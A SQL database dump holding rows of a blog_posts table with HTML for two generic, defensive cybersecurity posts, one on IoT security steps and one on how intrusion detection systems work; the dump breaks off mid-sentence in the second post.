(134, 'IoT Security: Protecting Your Smart Devices and Data', 'iot-security-protecting-your-smart-devices-and-data', '<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why IoT Security Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Internet of Things (IoT) is revolutionizing how we live, work, and interact with technology every day. With smart homes, wearable tech, industrial automation, and connected infrastructure, IoT devices have become essential tools in our increasingly connected lives. However, with great connectivity comes great responsibility, particularly in addressing the significant security risks these devices present.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding IoT security is critical if we want to fully enjoy the benefits of connected devices without facing the potential dangers. Here’s why prioritizing IoT security is non-negotiable:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Protecting Sensitive Information</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IoT devices collect and store large quantities of sensitive data, including location history, medical information, and financial data. This makes them prime targets for hackers and unauthorized access attempts. Without proper security, this information is vulnerable to breaches, potentially exposing users to identity theft, spying, or fraud.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Safeguarding Privacy</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Maintaining privacy is becoming increasingly difficult in a hyperconnected world. Weak IoT security measures compromise the confidentiality of users\' personal data, resulting in unwanted invasions of privacy. Did you know that even unprotected smart home devices, like a thermostat or camera, can expose user habits to cybercriminals?</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Addressing a Large Attack Surface</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The abundance of IoT devices in homes, businesses, and critical industries has created a vast attack surface for potential cyberattacks. Each connected device becomes a potential entry point for hackers, putting entire ecosystems of systems at risk. Managing these vulnerabilities is critical to crafting a secure environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Preventing Data Breaches</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Weak IoT security can lead to data breaches, placing businesses, governments, and individuals at risk. For organizations, a breach of customer data could damage both finances and reputation. For critical infrastructure, the stakes are even higher, with potential service disruptions that could impact entire communities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By focusing on IoT security, individuals and organizations can prevent these threats and fortify their systems to remain resilient against cyber challenges. But how do you protect your IoT ecosystem effectively? Below are seven essential steps to improving IoT security.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7 Key Steps to Enhance IoT Security</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1. Strengthen Device Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Safeguarding individual IoT devices is the foundation of any strong security strategy. To secure your devices effectively:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always choose devices from reputable manufacturers with a proven track record of security.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Configure IoT devices properly as soon as you install them. Avoid keeping default factory settings, particularly usernames and passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Use strong, unique passwords and enable encryption where possible.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Keep your devices updated with the latest firmware and security patches. Outdated software is often a gateway for attackers.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By beginning with strong device-level defenses, you lay the groundwork for a robust IoT security framework.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2. Invest in Network Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A secure IoT ecosystem needs more than protected devices—it needs a secure network to function on. Here’s how to achieve it:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use encryption technologies, secure firewalls, and Virtual Private Networks (VPNs) to protect your network traffic from prying eyes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Safeguard your Wi-Fi network with strong encryption protocols and complex passwords. Avoid default SSIDs that can reveal your device type or location.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Employ secure communication protocols like TLS (Transport Layer Security) or SSL (Secure Sockets Layer) to ensure data transmission is safe.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3. Control Authentication and Access</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Secure authentication practices can significantly reduce the risk of unauthorized access. Best practices include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Implementing strong authentication mechanisms such as password protection, biometrics (e.g., fingerprint or facial recognition), and encryption certificates to restrict who can access your devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Leveraging role-based access control to limit permissions at both device and data levels. Only authorized individuals should have access to sensitive information.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4. Ensure Data Security</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IoT devices collect and transmit enormous quantities of data regularly. To protect these data assets, consider the following:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Encrypt data both during transit and when at rest. Encryption prevents unauthorized users from understanding captured data if they intercept it.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Implement secure storage practices like regular data backups and clear data retention policies to ensure sensitive information is handled with care and remains accessible when needed.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5. Monitor and Log Activity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding what’s happening within your IoT ecosystem is critical to addressing potential threats. Practical measures here include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Installing monitoring software to track device behavior and identify anomalies or suspicious activity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Setting up robust logging protocols to keep a record of events across connected devices. These logs can help investigate incidents and offer insights for future improvements.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6. Vet and Monitor Third-Party Providers</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IoT ecosystems often rely on third-party service providers (e.g., cloud platforms). To manage this complexity:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Thoroughly examine the security credentials and certifications offered by your vendors.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Conduct regular security assessments to identify any weak links in your providers’ systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Establish a monitoring process to ensure third parties maintain security over time. Always avoid providers who do not offer transparency regarding their security practices.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 7. Educate and Raise Awareness</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Continuous education is one of the most impactful ways to ensure IoT devices remain secure. Keep your workforce and family members informed:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Train employees and users on securing device configurations, creating strong passwords, and respecting data privacy principles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Highlight common risks, including phishing attacks and social engineering, to make individuals more security-conscious.</li>\r\n</ul>\r\n\r\n<hr />\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">IoT Security is an Ongoing Process</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IoT security is not a one-and-done task. It’s a dynamic, ongoing process that requires vigilance and collaboration. Cyber threats evolve continuously, and staying one step ahead means adapting to new challenges with upgraded tools, updated configurations, and increased user knowledge.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By following the steps above, from securing devices to educating users, organizations and individuals can mitigate the security risks linked to IoT devices. Prioritizing IoT security isn’t just about protecting the devices themselves—it’s about safeguarding the data, privacy, and trust that these devices carry into our daily lives.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To further secure your connected ecosystem, start evaluating your current IoT infrastructure and begin implementing these strategies today. A secure IoT world is within reach—are you ready to take the first step?</p>\r\n\r\n\r\n<hr />\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This SEO-optimized blog post not only highlights the critical importance of IoT security but also offers actionable advice for businesses and individuals. The use of keywords like “IoT security,” “protect IoT devices,” and “enhance IoT security” ensures better search visibility and relevance for readers seeking this content.</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:24:35', '2026-01-12 21:41:44', 'Information Security', 'IoT Security: Protecting Your Smart Devices and Data', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(135, 'The Fundamentals of Intrusion Detection Systems (IDS): How They Work and Why They\'re Essential', 'the-fundamentals-of-intrusion-detection-systems-ids-how-they-work-and-why-theyre-essential', '<div class=\"flex-1 overflow-hidden\">\r\n<div class=\"h-full overflow-y-auto\">\r\n<div class=\"flex flex-col items-center text-sm h-full dark:bg-gray-800\">\r\n<div class=\"w-full border-b border-black/10 dark:border-gray-900/50 text-gray-800 dark:text-gray-100 group bg-gray-50 dark:bg-[#444654]\">\r\n<div class=\"text-base gap-4 md:gap-6 m-auto md:max-w-2xl lg:max-w-2xl xl:max-w-3xl p-4 md:py-6 flex lg:px-0\">\r\n<div class=\"relative flex w-[calc(100%-50px)] md:flex-col lg:w-[calc(100%-115px)]\">\r\n<div class=\"flex flex-grow flex-col gap-3\">\r\n<div class=\"min-h-[20px] flex flex-col items-start gap-4 whitespace-pre-wrap\">\r\n<div class=\"markdown prose w-full break-words dark:prose-invert dark\">\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity threats continue to evolve, making robust network protection more critical than ever. If you\'re looking to enhance your security strategy, understanding <b><strong class=\"font-bold\">Intrusion Detection Systems (IDS)</strong></b> is a great place to start. This blog explores how IDS works, the methods they use, and their importance in monitoring and protecting your network.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Is an Intrusion Detection System (IDS)?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">At its core, an <b><strong class=\"font-bold\">Intrusion Detection System (IDS)</strong></b> is a cybersecurity tool that monitors a network or system for any signs of malicious activity. Rather than blocking threats, the IDS detects suspicious actions and alerts administrators so they can respond swiftly and appropriately.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While IDS alone doesn’t prevent attacks—it leaves that task to an <b><strong class=\"font-bold\">Intrusion Prevention System (IPS)</strong></b>—it\'s an essential first step in identifying vulnerabilities before they escalate into data breaches or other serious security concerns.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Two Primary Methods of Traffic Monitoring</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IDS operates by analyzing network traffic, and there are two primary methods for capturing and examining this traffic to identify threats effectively.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Packet Capture</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">How it works</strong></b>: This method captures raw network packets at the <b><strong class=\"font-bold\">data link</strong></b> or <b><strong class=\"font-bold\">network layer</strong></b>. It examines every packet in the monitored network segment to uncover vulnerabilities or malicious activities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Where it\'s used</strong></b>: Network-based Intrusion Detection Systems (<b><strong class=\"font-bold\">NIDS</strong></b>) frequently rely on this approach to scan packets across an entire network.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Benefits</strong></b>: Offers a granular view of network traffic, making it effective for detecting distributed attacks or threats affecting multiple systems.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Protocol Analysis</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">How it works</strong></b>: This method focuses on analyzing higher-level protocols, like <b><strong class=\"font-bold\">TCP, UDP</strong></b>, and specific aspects of communication such as application-layer data or system calls.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Where it\'s used</strong></b>: Host-based Intrusion Detection Systems (<b><strong class=\"font-bold\">HIDS</strong></b>) commonly adopt this approach for pinpointing irregular activity within a specific device or host.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Benefits</strong></b>: Provides in-depth insights into communications, making it ideal for evaluating patterns within application-level interactions, like missing authentication attempts.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By combining packet capture and protocol analysis, many IDS solutions provide broader visibility into network and host-level activity.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How an IDS Identifies Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once network traffic is captured, it’s time for the IDS to perform its magic. Using an arsenal of threat identification techniques, the IDS detects suspicious activity, and here are the primary methods employed.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Signature-Based Detection</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it is</strong></b>: Signature-based IDS compares traffic against a database of pre-determined rules or signatures. These signatures are characteristics of known attacks, such as specific <b><strong class=\"font-bold\">IP addresses</strong></b> or <b><strong class=\"font-bold\">port numbers.</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Advantage</strong></b>: This technique is highly effective at identifying well-documented attacks quickly and accurately.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Challenge</strong></b>: It may miss new, emerging threats (i.e., zero-day attacks) that don’t fit an existing signature profile.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Anomaly Detection</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it is</strong></b>: Anomaly detection methods look for unusual or abnormal patterns of network traffic that deviate from the norm.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Advantage</strong></b>: These systems adapt to identify newer, previously unknown threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Challenge</strong></b>: They are prone to generating false positives, requiring careful calibration.</li>\r\n</ul>\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Heuristics and Behavioral Analysis</h4>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it is</strong></b>: Heuristics-based systems use algorithms to evaluate behavior across the network, identifying actions that match known malicious behaviors.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Advantage</strong></b>: This method excels at spotting complex, sophisticated attacks by analyzing overall activity rather than predefined rules.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By using a mix of these techniques, IDS can uncover not only obvious threats but also stealthier, less predictable attacks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Happens When Suspicious Activity Is Detected?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When the IDS detects an intrusion or irregular pattern, it immediately triggers an alert. Administrators are notified via dashboards, emails, or other notification systems. Beyond standard alerts, automated reporting can provide detailed insight into the activity detected, such as its source, affected devices, and severity.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From here, the network administrator is equipped to take appropriate counteractions, including blocking malicious IP addresses, shutting down compromised systems, or flagging suspicious access attempts for further investigation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Limitations of Intrusion Detection Systems</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">No tool is flawless, and it’s important to acknowledge the limitations of IDS to manage realistic expectations.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">False Positives and Negatives</strong></b>: Fine-tuning is essential, as IDS systems can sometimes flag benign activity as threats (false positives) or fail to identify genuine threats (false negatives).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Detection vs. Prevention</strong></b>: IDS is designed for <b><strong class=\"font-bold\">detection</strong></b>, not prevention—it won’t directly stop an attack. This means deploying a complementary <b><strong class=\"font-bold\">Intrusion Prevention System (IPS)</strong></b> is crucial for a fully secure environment.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Still, despite their limitations, Intrusion Detection Systems act as a necessary safeguard in modern cybersecurity frameworks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Your Business Needs an IDS</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Investing in an IDS provides several significant benefits for your business\'s network security.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Proactive Threat Detection</strong></b>: Early identification of vulnerabilities allows your team to prevent damage before it occurs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Enhanced Compliance</strong></b>: Many industries require IDS implementation to meet data protection standards.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Layered Security</strong></b>: IDS is an integral component of a holistic cybersecurity approach that includes firewalls, antivirus software, and an IPS.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By adding 